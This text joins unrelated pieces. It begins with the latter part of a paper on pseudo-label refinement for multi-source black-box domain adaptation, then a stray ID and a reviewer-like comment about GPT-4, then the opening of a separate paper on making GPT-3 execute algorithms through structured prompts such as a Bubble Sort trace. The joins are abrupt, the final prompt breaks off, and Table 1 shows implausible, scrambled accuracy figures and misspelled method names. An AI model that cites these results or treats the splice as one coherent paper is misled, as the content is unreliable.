Eq.(5), the reduction of both the dispersion in \( P_c \) and \( P_d \) and the distance between \( p_c \) and \( p_d \) would lower the upper bound. \( e(p_c, y_T) \) is an inherent error in MSBDA. In the following sections, we will explain how to perform pseudo-labeling for a \( K \)-way classification task in a practical MSBDA setting, based on the theoretic analysis. ### 3.3 Label Space Division in \( K \)-Way Classification In the \( K \)-way classification, given \( x_T \), \( p_{ij} \) refers to the \( j \)-th element of the output probability vector from the \( i \)-th source model \( f_i(x_T) \in \mathbb{R}^K \) among \( M \) source domains. We define a set \( J = \{ j^*_i \} \) of indices \( j^*_i = \arg \max_j p_{ij} \) to maximize \( p_{ij} \) over \( j \) and a set \( I_c = \{ i_c | j^*_i = c \} \) of indices \( i_c \) where \( c = \arg \max_k \sum_i 1(j^*_i = k) \). We define a set \( P_c \) to include \( p_{i_cj^*_c} \), in which \( i_c \in I_c \) and \( j^*_c = j^*_{i_c} \). The representative label \( p_c \in P_c \) is selected as \( \max p_{i_cj^*_c} \) over \( i_c \). When the cardinal number of \( I_c \) is \( M \), in which all the source predictions are different, we select the source prediction with the highest probability regardless of the categories. \( P_d \) and \( I_d \) are defined as \( P \setminus P_c \) and \( I \setminus I_c \), respectively. \( p_d \in P_d \) is chosen as \( \min p_{i_dj'} \) over \( i_d \), when \( j' \in J \setminus \{ j^*_c \} \) is the classification result of \( f_{i_d}(x_T) \). Figure 2: The proposed self-learning framework with a pseudo label refinement network (PRN), including a warm-up, a label refinement, and a target adaptation phase. PRN consists of attention (AT) and fully connected (FC) layers to consider the relevance between source and target domains and resolve their complex statistical relations. In the adaptation, the PRN is trained to improve the reliability of a pseudo label by encouraging the concentration within label spaces and closeness across label spaces, based on theoretical analysis. 3.4 Pseudo Label Refinery Network The proposed method utilizes a pseudo label refinery network (PRN) with a target model to generate high-quality pseudo labels, as shown in Figure 2. PRN is designed to learn the relations not only between different source domains but also between source domains and a target domain. For this, it is implemented with the stacks of refinement blocks that include an attention layer (AT) and a fully connected layer (FC) followed by softmax (SM) layer, as presented in Figure 2. The AT is added to capture the level of attention or relevance of one source prediction to the other predictions. The FC generates refined predictions from the inputs. When $p_i (= f_i(x_T))$ is digested to generate the final pseudo label through the PRN, it is not limited to be a simple linear combination of source predictions and $\alpha_i$. The refinement-and-adaptation process using PRN consists of three phases, including a warp-up phase, a label-refinement phase, and a target adaptation phase. It is highlighted that our genuine contribution in the PRN lies in both the warm-up and label-refinement phases. Although we have made modifications to the target adaptation phase compared to previous studies, we maintained consistent training parameters to assess the enhanced performance achieved by our proposed method. 3.4.1 Warm-up Phase The output of PRN is noisy with randomly initialized parameters in an early stage of adaptation. Warm-up phase is used to avoid a failure due to such noisy samples and to produce initial predictions similar to the original source predictions. Denote $\mathcal{P}$ and $\mathcal{P}^w$ as an input concatenation of source predictions $[p_1 \ldots p_M]^T$ and the outcomes of the warm-up phase $[p_1^w \ldots p_M^w]^T$, i.e., $\mathcal{P}^w = \text{PRN}(\mathcal{P})$. The PRN in the warm-up phase is trained using a loss function, defined as $$\mathcal{L}_w = \mathbb{E}_{x_t \in \mathcal{X}_T} \mathbb{E}_{i \in \mathcal{I}} K\mathcal{L}(p_i \| p_i^w),$$ (6) where $K\mathcal{L}$ is the Kullback-Leiger (KL) divergence, and $\mathcal{I}$ is a set of categorical indices. After the warm-up phase, $p_i^w$ is averaged over $i$ and used as an initial pseudo label to be refined later. 3.4.2 Label Refinement Phase The PRN refines the input predictions using both source and target predictions in this phase. It is necessary to exploit both predictions, because a target prediction can offer knowledge learned from a target model $f_T$ with an unlabeled target sample $x_T$. In what follows, the PRN takes the original source prediction $\mathcal{P}$ as a query and a value and a target prediction $p_T (= f_T(x_T))$ as a key and conducts a cross-attention operation through the AT and produces an output $\mathcal{P}_r$ as follows: $$\mathcal{P}_r = [p_1^r \ldots p_M^r]^T = \text{PRN}(\mathcal{P}, \mathcal{P}_T),$$ (7) where $\mathcal{P}_T = [p_T \ldots p_T]^T \in \mathbb{R}^{M \times K}$. The cross-attention calculates the level of attention of one target prediction to several source predictions in the label space and allows the PRN to be trained in an unsupervised manner and reflect the relations between the source and target domains. The label space $\mathcal{P}_r$ is divided into $\mathcal{P}_c^r$ and $\mathcal{P}_d^r$ in the label refinement phase in Figure 2. The majority of the pseudo labels that output the same classification results are grouped to $\mathcal{P}_c^r$. The other pseudo labels are grouped to $\mathcal{P}_d^r$. We then define a training objective based on the analysis in Theorem 2. First, we define a concentration loss to reduce each dispersion within $\mathcal{P}_c^r$ and $\mathcal{P}_d^r$ (see $\eta_c$ and $\eta_d$ in Eq.(5)), respectively, given as, $$L_{cc} = \mathbb{E}_{x_T \in X_T} \mathbb{E}_{p_r \in \mathcal{P}_c^r} KL(p_c^r \| p_r),$$ (8) and $$L_{cd} = \mathbb{E}_{x_T \in X_T} \mathbb{E}_{p_r \in \mathcal{P}_d^r} KL(p_d^r \| p_r),$$ (9) where the representative labels $p_c^r \in \mathcal{P}_c^r$ and $p_d^r \in \mathcal{P}_d^r$ are chosen as explained in Section 3.3. We employ a loss function to consider the distance between the two representative labels (see the last term in Eq.(5)), given as $$L_{ld} = \mathbb{E}_{x_T \in X_T} KL(p_c^r \| p_d^r).$$ (10) Further, a stabilization loss $L_s = \mathbb{E}_{x_i \in X_T} \mathbb{E}_{i \in I} KL(p_i \| p_i')$ to produce an approximation of $p_i$ as an initial value and avoid overfitting of the PRN to irrelevant probabilities. The PRN is trained using the total loss $L_r$ in the refinement phase, defined as $$L_r = L_{cc} + \lambda_{cd} L_{cd} + \lambda_{ld} L_{ld} + \lambda_s L_s.$$ (11) ### 3.4.3 Target Adaptation Phase In this phase, a target model is trained using a generated pseudo label from the PRN. First, we compute an average of $p_r$ to decide the final pseudo label, i.e., $\hat{p} = \frac{1}{M} \sum_{i=1}^{M} p_i^r$ and train a target model using $\hat{p}$ as the ground truth through a self-learning loss, i.e., $L_{sl} = \mathbb{E}_{x_T \in X_T} KL(\hat{p} \| f_T(x_T))$. In addition, we utilize a mutual information loss to encourage the target model to maintain diversity among its predictions across all target instances. To this end, the mutual information objective (Liang et al., 2020; 2022), which is widely used as $L_{im} = L_{ent} + L_{div} = \mathbb{E}_{x_T \in X_T} H(f_T(x_T)) - H(\hat{f}_T(x_T))$, where $H$ denotes a conditional entropy function, and $\hat{f}_T(x_T) = \mathbb{E}_{x_T \in X_T} f_T(x_T)$. Taken together, the final objective of the target model is given by $L_t = \lambda_t L_{sl} + L_{im}$, where $\lambda_t = \exp(-I/I_{target})$ is a hyper-parameter with the exponential decay with respect to iteration $I$. $I_{target}$ is a total training iteration of target adaptation. During the target adaptation, the label refinement phase is performed at regular intervals. ## 4 Experiments ### 4.1 Experimental Setting **Datasets, training parameters, and implementation details.** We evaluate the performance of the proposed method on four benchmark datasets, i.e., Office (Hoffman et al., 2018b), Office-Caltech (Saenko et al., 2010), Office-Home (Venkateswara et al., 2017) and DomainNet (Peng et al., 2019), that include data samples in different domains. We designate one of the domains as a target domain and the remaining domains as source domains as described in Sec. E.1. For fair comparisons, we follow the same experimental settings as previous works (Liang et al., 2020; Ahmed et al., 2021; Liang et al., 2022). We describe a detailed training parameter setting such as training epochs, learning rates, and batch sizes in Sec. E.1. We use two deep models with ResNet101 (He et al., 2016) and ViT-B_16 (ViT16 for simplicity) (Dosovitskiy et al.) for source models. ResNet-101 is used as the target model. PRN is trained in every epoch of a target model training, whereas the warm-up phase is conducted once. We have reinitialized a learning rate at each training epoch of the refinement phase for reliable training, when $p_c$ and $p_d$ change on the same sample. The total training epoch is 15. We measure the performance of the proposed method three times using different random seeds {2019, 2020, 2021} via PyTorch (Paszke et al., 2017) and report the average performances. **Performance Comparison.** We compare our method with state-of-the-art MSDA methods to evaluate its effectiveness. **No Adapt.** (also known as “Source Only”)” denotes the test performance on target data, when a model is trained using only the source data. Considering the MS setting, we further compare **No Adapt (SB)** that is assumed to choose the most suitable source prediction for the adaption, which is the ideal scenario but usually infeasible. In contrast, **No Adapt (SW)** is assumed that a user chooses the worst source prediction. Moreover, we provide **No Adapt (MS)** when the source model is trained using all the source data from available source domains. We categorize the tested DA methods with their MS settings as MSDA, MSFDA, and MSBDA. For MSDA, we present the adaptation results from M$^3$SDA, M$^3$SDA-$\beta$ (Peng et al., 2019), SimpAI$^{101}$ (Venkat et al., 2020), and MFSAN (Zhu et al., 2019). Both source data and models are available in these methods. Furthermore, we compare MSFDA methods, including SHOT, SHOT++ (Liang et al., 2021), DECISION (Ahmed et al., 2021), and CAiDA (Dong et al., 2021). For Liang et al. (2021), we also report the performance of SHOT-ens, which takes an average of the soft prediction as a target prediction, to pose the method in an MS setting. DINE (Liang et al., 2022) is a single-source BDA method and extended to MSBDA, thus used for performance comparisons. DINE used a two-step learning procedure, including source adaptation to a target model with DINE (w/o FT) and further fitting to a specific target domain with DINE (FT). Because the primary objective of a generic UDA is to generalize target domains and maintain its performance even when faced with different domain shifts, we mainly compared the performance of DINE (w/o FT) with our method. ### 4.2 Experimental Results The classification results on Office, Office-Caltech, Office-Home, and DomainNet are shown in Table 1.2. “MU”, “MS”, and “MB” refer to MSDA, MS-SFDA, and MSBDA, respectively. A right arrow “$\rightarrow$” refers to an adaptation task. For instance, “$\rightarrow$ W” denotes the target adaptation from all the other domains to a domain “W.” Because MSDA and MS-SFDA have access to model parameters, the source and target models have the same structure, and they are tested, only when the models use ResNet101 in common. BDA does not have such constraints, allowing for ViT16 as a source model. In the MSBDA setting, our method achieves competitive accuracy across four datasets, and notably, it demonstrates comparable performance to the other methods in the MSDA and MS-SFDA settings. Our method accomplishes these results even in the absence of source data and models. The highest accuracy achieved within the MSBDA setting is highlighted in bold. Compared to DINE, the proposed method consistently provides superior classification performance across all datasets and source models. This result demonstrates the efficiency of our approach in transferring positive knowledge from source domains without the aid of source data and models. **Results on Office.** We present the adaptation results on Office in Table 1. Our method outperformed DINE (w/o FT) with a margin of 3.6% on average. Furthermore, our method achieved comparable performances to UDA and SFDA methods. Compared to CAiDA (Dong et al., 2021), which is the state-of-the-art MS-SFDA method, our approach achieved an increase of 0.2% with ResNet101. **Results on Office-Caltech.** Office-Caltech has been known to be comparably easy for target adaptation, when considering its accuracy in “No Adapt”. Most of the MSDA and MS-SFDA methods achieved substantial performance improvements as compared to “No Adapt (MS)”. Our method outperformed DINE (w/o FT) by 1.7% in ResNet101. **Results on Office-Home.** Our method exhibited similar phenomenon on Office-Home. The proposed method achieved the best accuracy for all the tasks in UDA and SFDA methods. LPR also outperformed DINE (w/o FT) by the margin of 4.2% on average. **Results on DomainNet.** Table 2 displayed the performance on DomainNet, which was challenging task due to a large number of categories and their associated large discrepancies. Compared to other Table 1: Classification accuracy (%) on Office, Office-Caltech, and Office-Home. | $f_S$ Methods | Setting | Office | Office-Caltech | Office-Home | |---------------|---------|--------|----------------|-------------| | No Adapt (SB) | - | 64.8 | 98.2 | 94.8 | | No Adapt (SW) | - | 53.9 | 81.5 | 81.1 | | No Adapt (MS) | - | 64.5 | 82.3 | 80.7 | | SIMpAI<sub>101</sub> (Venkat et al., 2020) | MU | 99.4 | 97.9 | 71.2 | | MFSAS (Zhu et al., 2019) | MS | 72.7 | 99.5 | 98.5 | | SHOT (Liang et al., 2021) | MS | 75.4 | 98.4 | 99.6 | | DENSE (Liang et al., 2021) | MS | 75.4 | 98.4 | 99.6 | | SHOT++ (Liang et al., 2021) | MS | - | - | - | | CAADA (Dong et al., 2021) | MS | 75.8 | 99.8 | 98.9 | | DINE (w/o FT) (Liang et al., 2022) | MB | 69.2 | 98.6 | 96.9 | | DINE (FT) (Liang et al., 2022) | MB | 76.8 | 99.2 | 98.4 | | LPR (Ours) | MB | 77.2 | 99.3 | 98.7 | Table 2: Classification accuracy (%) on DomainNet. | $f_S$ Methods | Setting | →Cln | →Inf | →Pnt | →Qdr | →Rel | →Skt | Avg. | |---------------|---------|------|------|------|------|------|------|------| | No Adapt (SB) | - | 52.8 | 20.5 | 48.7 | 13.5 | 58.1 | 43.7 | 39.4 | | No Adapt (SW)* | - | 10.6 | 1.2 | 3.9 | 2.7 | 4.4 | 5.0 | 5.0 | | No Adapt (MS)* | - | 47.6 | 13.0 | 38.1 | 13.3 | 51.9 | 33.7 | 32.9 | | M'SDA<sup>+</sup> (Peng et al., 2019) | MU | 57.2 | 24.2 | 51.6 | 5.2 | 61.6 | 49.6 | 41.5 | | M'SDA<sup>−</sup> (Peng et al., 2019) | MU | 58.6 | 26.0 | 52.3 | 6.3 | 62.7 | 49.5 | 42.6 | | SIMpAI<sub>101</sub> (Venkat et al., 2020) | MU | 66.4 | 25.6 | 56.6 | 18.9 | 68.0 | 55.5 | 48.6 | | SHOT ens (Liang et al., 2021) | MS | 58.6 | 25.2 | 55.3 | 15.3 | 70.5 | 52.4 | 46.2 | | DECISION (Ahmed et al., 2021) | MS | 63.2 | 22.3 | 54.6 | 18.2 | 67.9 | 51.4 | 46.3 | | DINE (w/o FT) (Liang et al., 2022) | MB | 61.4 | 21.5 | 54.7 | 13.4 | 70.9 | 50.3 | 45.4 | | DINE (FT) (Liang et al., 2022) | MB | 55.9 | 6.3 | 54.2 | 0.2 | 62.2 | 38.6 | 26.6 | | LPR (Ours) | MB | 63.9 | 24.0 | 55.1 | 13.6 | 70.8 | 51.2 | 46.4 | | No Adapt (SB) | - | 5.5 | 19.9 | 47.0 | 14.9 | 62.1 | 45.2 | 40.7 | | No Adapt (SW)* | - | 4.5 | 0.5 | 0.9 | 4.1 | 1.6 | 6.4 | 3.0 | | DINE (w/o FT) (Liang et al., 2022) | MB | 63.0 | 21.6 | 56.7 | 15.0 | 72.8 | 50.2 | 46.5 | | DINE (FT) (Liang et al., 2022) | MB | 58.2 | 5.3 | 35.9 | 0.2 | 24.8 | 33.5 | 26.3 | | LPR (Ours) | MB | 65.2 | 24.2 | 56.9 | 15.8 | 73.1 | 50.6 | 47.6 | Datasets, it is hard to achieve high adaptation accuracy in every setting. Nevertheless, our method achieved comparable performance to all the methods except SIMpAI<sub>101</sub> (Venkat et al., 2020). DINE has significantly degraded performance by approximately 20%, when it used the FT in DomainNet. In (Liang et al., 2022), the FT has been optimized to fit the Office datasets and improved the performance in the same datasets. However, DomainNet dataset was not used for the optimization, and the FT could worsen the domain shift problem. Our method did not experience such failure. ### 4.3 Performance Analysis and Ablation Studies Table 3: Ablation studies on Office, (a) when each component including warm up (WU), label refinement (LR), and target adaptation (TA) is turned on or off, and (b) when the loss functions are differently combined during the LR phase. #### Effect of phases. In Table 3a, the warm-up (WU) and label refinement (LR) steps of the PRN significantly improved the adaptation performance. LR has improved 6.6% in comparison to the TA only. WU further improved 4.6%. The tests demonstrated the efficacy of the components. Figure 3: (a) Ablation studies on PRN with loss functions and (b) a refinement interval. (a) and (b) are tested with an Office dataset. (c) Classification accuracy of the refined predictions and target prediction during the target adaptation phase for “→ Ar” task on an Office-Home dataset. **Loss function.** In Table 3b, we presented the adaptation accuracy during LR, when each loss in Eq. (11) was added. ResNet101 was used for both $f_S$ and $f_T$. LPR achieved a similar performance to DINE (w/o FT), when using only the $L_{cc}$. The performance has been further improved using $L_{cd}$ and $L_{ld}$ by the margin of 0.6% and 1.3%, respectively. We achieved further improvements of 2.1% with $L_s$. More ablation tests are presented with various $\lambda_{cd}$, $\lambda_{ld}$ and $\lambda_s$ of Eq. (11) in Sec. E.4. **Training interval of LR.** We then analyze the training interval of a LR phase. The LR phase was performed every 1 epoch of target adaptation. In Figure 3(a), we illustrated the adaptation performance, when the interval increased to 2, 3, and 4 epochs. We found that 1 epoch was appropriate and the performance of the adaptation would degrade if the refinement process was not sufficiently applied. In other words, the refinement process was effective during adaptation. **Investigation of a domain adaptation phase.** In Figure 3(b), we illustrated how the quality of refined source predictions changes during the target adaptation. We reported the result of the adaptation to Art (Ar) domain of Office-Home. The orange, green and yellow curve displayed the variations of the quality of source predictions from CI, Pr, and Re source, respectively, and the black curve displayed the adaptation performance. In the beginning, each source curve presented the quality of the output of the PRN after the warm-up. Up to 2 training epochs, the quality tended to decrease, because the target predictions up to this point were not helpful for refinement. However, the quality constantly increased as the refinement phase went on, and the accuracy kept improving. Noisy source predictions illustrated as orange and green curves have been further refined with a larger gradient than the yellow curve. There were more noisy samples affected by the refinement phase, and the quality has been improved, which implies the phase has been effective. **Selection of representative prediction $p_c$ and $p_d$.** In Sec. 3.2, we derive the condition of an optimal $p_c$. Nevertheless, because $y_T$ is unknown, it is intractable to precisely determine the representative predictions. We presented a method to designate $p_c$ in Sec. 3.3 allowing for leveraging complementary information from many sources to avoid the incorrect designation. To ensure the effectiveness, we test several alternatives including a random selection (RS), the selection of a confident prediction (CP). The proposed method presented a superior performance to the alternatives, empirically justifying the selection of $p_c$. We also chose $p_d$ to have lower confidence prediction in $P_d$ and test several alternatives to justify the performance. The results can be found in Sec. E.5. ## 5 Conclusion and Future Work In this paper, we proposed a novel MSBDA pseudo-labeling framework that used only the predictions of source models to explore positive knowledge from multiple source domains. We derived a theoretical analysis to demonstrate the effectiveness of the proposed training method and justified the design of the PRN architecture to use an attention mechanism to resolve complex relations among different domains. We evaluated the performance of the proposed method on various benchmark datasets and demonstrated its superiority in comparison to state-of-the-art methods in various domain adaptation settings. In the future work, we will investigate open-set MSBDA problems. REFERENCES Sk Miraj Ahmed, Dripta S Raychaudhuri, Sujoy Paul, Samet Oymak, and Amit K Roy-Chowdhury. Unsupervised multi-source domain adaptation without access to source data. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 10103–10112, 2021. Konstantinos Bousmalis, Nathan Silberman, David Dohan, Dumitru Erhan, and Dilip Krishnan. Unsupervised pixel-level domain adaptation with generative adversarial networks. In Proceedings of the IEEE conference on computer vision and pattern recognition, pp. 3722–3731, 2017. Koby Crammer, Michael Kearns, and Jennifer Wortman. Learning from multiple sources. Journal of Machine Learning Research, 9(8), 2008. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In 2009 IEEE conference on computer vision and pattern recognition, pp. 248–255. Ieee, 2009. Jiahua Dong, Yang Cong, Gan Sun, Bineng Zhong, and Xiaowei Xu. What can be transferred: Unsupervised domain adaptation for endoscopic lesions segmentation. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 4023–4032, 2020. Jiahua Dong, Zhen Fang, Anjin Liu, Gan Sun, and Tongliang Liu. Confident anchor-induced multi-source free domain adaptation. Advances in Neural Information Processing Systems, 34: 2848–2860, 2021. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In International Conference on Learning Representations. Yaroslav Ganin, Evgeniya Ustinova, Hana Ajakan, Pascal Germain, Hugo Larochelle, François Laviolette, Mario Marchand, and Victor Lempitsky. Domain-adversarial training of neural networks. The journal of machine learning research, 17(1):2096–2030, 2016. Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In Proceedings of the IEEE conference on computer vision and pattern recognition, pp. 770–778, 2016. Judy Hoffman, Mehryar Mohri, and Ningshan Zhang. Algorithms and theory for multiple-source adaptation. Advances in Neural Information Processing Systems, 31, 2018a. Judy Hoffman, Eric Tzeng, Taesung Park, Jun-Yan Zhu, Phillip Isola, Kate Saenko, Alexei Efros, and Trevor Darrell. Cycada: Cycle-consistent adversarial domain adaptation. In International conference on machine learning, pp. 1989–1998. PMLR, 2018b. Shatha Jaradat. Deep cross-domain fashion recommendation. In Proceedings of the Eleventh ACM conference on recommender systems, pp. 407–410, 2017. Chen-Yu Lee, Tanmay Batra, Mohammad Haris Baig, and Daniel Ulbricht. Sliced wasserstein discrepancy for unsupervised domain adaptation. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 10285–10295, 2019. Yitong Li, David E Carlson, et al. Extracting relationships by multi-domain matching. Advances in Neural Information Processing Systems, 31, 2018. Jian Liang, Dapeng Hu, and Jiashi Feng. Do we really need to access the source data? source hypothesis transfer for unsupervised domain adaptation. In International Conference on Machine Learning, pp. 6028–6039. PMLR, 2020. Jian Liang, Dapeng Hu, Yunbo Wang, Ran He, and Jiashi Feng. Source data-absent unsupervised domain adaptation through hypothesis transfer and labeling transfer. IEEE Transactions on Pattern Analysis and Machine Intelligence, 44(11):8602–8617, 2021.
vLJg4wgBPu
- I was able to verify that GPT-4 correctly outputs a trace for the example shown in Prompt 1. However, the same prompt on a slightly larger input produces a correct answer but starts to include comments like one might see in code. Is this expected?
GPT IS BECOMING A TURING MACHINE: HERE ARE SOME WAYS TO PROGRAM IT Anonymous authors Paper under double-blind review ABSTRACT We demonstrate that, through appropriate prompting, GPT-3 can be triggered to perform iterative behaviours necessary to execute (rather than just write or recall) programs that involve loops, including several popular algorithms found in computer science curricula or software developer interviews. We trigger execution and description of iterations by regimenting self-attention (IRSA) in one (or a combination) of three ways: 1) Using strong repetitive structure in an example of an execution path of a target program for one particular input, 2) Prompting with fragments of execution paths, and 3) Explicitly forbidding (skipping) self-attention to parts of the generated text. On a dynamic program execution, IRSA leads to larger accuracy gains than replacing the model with the much more powerful GPT-4. IRSA has promising applications in education, as the prompts and responses resemble student assignments in data structures and algorithms classes. Our findings hold implications for evaluating LLMs, which typically target the in-context learning: We show that prompts that may not even cover one full task example can trigger algorithmic behaviour, allowing solving problems previously thought of as hard for LLMs, such as logical puzzles. Consequently, prompt design plays an even more critical role in LLM performance than previously recognized. 1 INTRODUCTION Large language models (LLMs) (Brown et al., 2020; Rae et al., 2021; Chowdhery et al., 2022; OpenAI, 2023) are trained on large text datasets, which typically include descriptions of procedures and even computer programs (Chen et al., 2021). Their performance on complex reasoning tasks remains limited even with advanced prompting methods, e.g. Chain-of-Thought (CoT) (Schwartz et al., 2020; Zelikman et al., 2022; Nye et al., 2021; Wei et al., 2022; Wang et al., 2022b; Zhou et al., 2022; Creswell et al., 2022; Wang et al., 2022a; Liu et al., 2022; Kojima et al., 2022; Li et al., 2022a). This implies that despite their size, current LLMs are unlikely to execute algorithms or solve problems such as logical deduction and logical grid puzzles in BIG-bench Lite (Srivastava et al., 2022), that require many (or iterated) reasoning steps in a direct, savant-like manner. LLMs generate tokens in order, each based on previous tokens in the sequence, whether these are part of the prompt or have just been generated by the LLM itself. Such self-attention could allow an LLM to use all previously generated tokens as the store of information needed for tracking reasoning steps, states, etc.\footnote{This is likely contributing to the success of CoT prompting, in addition to such prompts’ explanatory value.} Such use of generated tokens would resemble a classical Turing Machine with its memory tape (Turing, 1936). In principle, a non-trivial recurrent transformer model with infinite attention could be Turing-complete and capable of executing arbitrary routines, as long as the attention mechanism can be controlled stringently enough. But, even in relatively simple settings, LLMs appear to resist strict controls. Slight changes in prompts can yield dramatically different responses (Liu et al., 2021; Malkin et al., 2022; Shi et al., 2023), because many recurrent patterns in the training data are encoded into a single model, and learned patterns overlap and vary in the context size. Thus it is easy to mislead with a prompt with accidental alphabetical or numerical ordering, or some undetectable semantic bias (Zhao et al., 2021; Lu et al., 2022; Min et al., 2022). In Section 2, we introduce much stricter attention controls that instruct LLMs to unroll reasoning steps of a procedure with the initially undetermined length, and decide when the solution is found: Iteration by Regimenting Self-Attention (IRSA). The basic way to achieve such deliberate self-attention control is through highly structured prompting with an example of execution path for one example, as illustrated for Bubble Sort algorithm in Prompt [1] which encourages an LLM to output not just the sorted sequence but also the swap count (response in Prompt [A.1] in Appendix), which is a challenging task to solve in a savant manner. We further explore fragmented prompting which combines multiple fragments of execution paths, as well as the strategy of skipping parts of generated text when performing self-attention. We also discuss interpreter/compiler prompts that can translate an algorithm in a high-level programming language into an IRSA prompt that GPT-3 can execute. We present results on a wide range of algorithms taught in computer science curricula and used to test software engineers in coding interviews, including string manipulations, dynamic programming, and stack operations in Section [3]. Our findings point to broader applications for LLMs in software engineering and education [Gao et al., 2022; Parisi et al., 2022; Schick et al., 2023; Mialon et al., 2023]. More pressingly, they point out a critical issue in evaluating in-context learning of LLMs, suggesting that current evaluations may underestimate LLMs’ abilities if prompts can combine natural language instructions with algorithmic iterative reasoning. The sensitivity of the performance to prompt design may be amplified by the iterative reasoning triggered by the prompt, which will then beg the question: If one LLM beats another on a task, is it simply because we have not found the right prompt for the second model? E.g., IRSA increases the performance of GPT-3 family on logical deduction puzzles from 32% to 76%. The discussion in the Appendix also includes an experiment with GPT-4 [OpenAI, 2023] on a well-known dynamic programming task showing that even the latest member in the family cannot consistently execute code without prompting in IRSA style. 2 Iteration by Regimenting Self Attention (IRSA): Explain Like I’m Five Autoregressive Prompt [1] triggering an execution of the Bubble Sort algorithm on an arbitrary input sequence, illustrates the basics of IRSA. For one input sequence, the prompt shows all state changes and explains each change before it occurs. The explanation is colloquial, but the structure of it is both rigid and repetitive, strictly regimenting the attention to the rules (corresponding to program instructions) and state changes. This strategy hardens the attention sufficiently to facilitate disciplined procedural reasoning, while leaving non-regimented content open to interpretation. (Sorting a sequence of 4 integers is demonstrated, but the same prompt can also be used to sort characters alphabetically or animals by size, and be applied to both shorter and longer input lists.) IRSA could be thought of as an instance of Chain-of-Thought prompting. However, a significant distinction lies in the number of reasoning steps, which is limited and fixed in usual CoT applications, and the thorough annotation of steps in the order of reasoning, which is especially important in the treatment of conditionals: Instead of specifying the effect of a state change (swapping two elements), and then explaining why it was done (because the two were out of order), the ‘why’ is given first. While either order may be equally explanatory in prompt, the difference becomes evident in generation, when LLM attempts to follow the prompt’s blueprint. If the explanation follows making a choice in the prompt, then the generation will follow the same pattern: make a cognitive leap to decide on a move, then rationalize that choice. In IRSA, instead, the reasoning comes first, and it is further segmented into substeps, so that new tokens inform the future choices as soon as possible: Check if $2 < 3$. Is it true? triggers evaluation, and then generated next token No or Yes triggers copying the pattern from the prompt leading to swapping the elements (or not). Similarly, a new iteration is triggered by first recalling the value of the swap flag. The structure of the prompt acknowledges the LLM’s autoregressive nature, and does not require big reasoning leaps in generation. Instead the LLM is instructed to use the generated token stream as a memory tape that triggers the desired behaviour. Interestingly, as LLMs can make educated guesses on how to follow any recipe, one can instruct with various levels of detail. Here, the investigation of the swap flag happens after all pairs have been visited, as we expect that an LLM may infer how to do the same in generation. In contrast, in Prompt [A.4], the state includes the iterator $i$, which is checked after each state transition to detect when the time for deciding on the next iteration has come. Examples of basic IRSA for single loop programs can be seen in Prompts [A.5] and [A.6] and for double loop programs in Prompts [1], [A.4], and [2]. In each of these examples, a single prompt is provided for a task, which, when combined with a new instance of the task, trigger the execution of an iterative algorithm, with potentially an unknown number of iterations until the stopping condition is met. Prompt 1. Bubble Sort: The prompt describes iterative state evolution, including counting swaps, and making the determination when to stop. Problem: 2, 3, 1, 5 EXECUTION Prep Length of the list: 4 Number of consecutive pairs: 3 a=[2 3 1 5] set n_swaps=0 EndPrep Iteration: set swap_flag=false. The state is: State: a=[2 3 1 5], n_swaps=0, swap_flag=false EndState Pair a[1,2] = [2 3] Check if 2<3. Is it true? Yes. Because of that, we leave state as is State: a=[2 3 1 5], n_swaps=0, swap_flag=false Pair a[2,3]= [3 1] Check if 3<1. Is it true? No. Thus, we swap_flag=true, increase n_swaps by one, and in the latest a=[2 3 1 5] swap 3 and 1 to get into state: State: a=[2 1 3 5], n_swaps=1, swap_flag=true EndState Pair a[3,4]= [3 5] Check if 3<5. Is it true? Yes. Because of that, we leave state as is State: a=[2 1 3 5], n_swaps=1, swap_flag=true EndState swap_flag is true, so do another iteration Iteration: set swap_flag=false. The state is: State: a=[2 1 3 5], n_swaps=1, swap_flag=false EndState Pair a[1,2] = [2 1] Check if 2<1. Is it true? No. Thus, we set swap_flag=true, increase n_swaps by one, and in the latest a=[2 1 3 5] swap 2 and 1 to get into state: State: a=[1 2 3 5], n_swaps=2, swap_flag=true EndState Pair a[2,3] = [2 3] Check if 2<3. Is it true? Yes. Because of that, we leave state as is State: a=[1 2 3 5], n_swaps=2, swap_flag=true EndState Pair a[3,4]= [3 5] Check if 3<5. Is it true? Yes. Because of that, we leave state as is State: a=[1 2 3 5], n_swaps=2, swap_flag=true EndState swap_flag is true, so do another iteration Iteration: set swap_flag=false. The state is: State: a=[1 2 3 5], n_swaps=2, swap_flag=false EndState Pair a[1,2] = [1 2] Check if 1<2. Is it true? Yes. Because of that, we leave state as is State: a=[1 2 3 5], n_swaps=2, swap_flag=false EndState Pair a[2,3] = [2 3] Check if 2<3. Is it true? Yes. Because of that, we leave state as is State: a=[1 2 3 5], n_swaps=2, swap_flag=false EndState Pair a[3,4]= [3 5] Check if 3<5. Is it true? Yes. Because of that, we leave state as is State: a=[1 2 3 5], n_swaps=2, swap_flag=false EndState swap_flag is false, so stop the iteration Final List: 1, 2, 3, 5 Number of swaps: 2 END OF EXECUTION Problem: 0, 3, 8, 5, 6 EXECUTION Prompt 2. Logical deduction puzzle IRSA prompt. Playground link (use with 0 temperature) PUZZLE: The following objects need to be ordered. obj1 is the biggest. obj2 is smaller than obj3. obj1 is bigger than obj2. QUESTION: Which object is the biggest? START Parsing step: Items: obj1, obj2, obj3 Number of items: 3 Statement 1: obj1 is the biggest. Statement 2: obj2 is smaller than obj3. Statement 3: obj1 is bigger than obj2. Scoring identification step: Scores will refer to size. Since we have 3 items, let’s assume that the biggest gets a score of 3 pounds and the smallest gets the score of 1 pound. Translation step: Available variable names: x, y, z, a, b, c Map item scores of ‘obj1’, ‘obj2’, ‘obj3’ to variable names x, y, z obj1 score is x; obj2 score is y; obj3 is z; Statement 1: ‘x’ is the biggest. Statement 2: ‘y’ is smaller than ‘z’. Statement 3: ‘x’ is bigger than ‘y’. Initialization step: Words used to qualify the relationships: smaller, bigger, biggest Orientation step: the biggest: refers to the score of 3 smaller: refers to smaller score 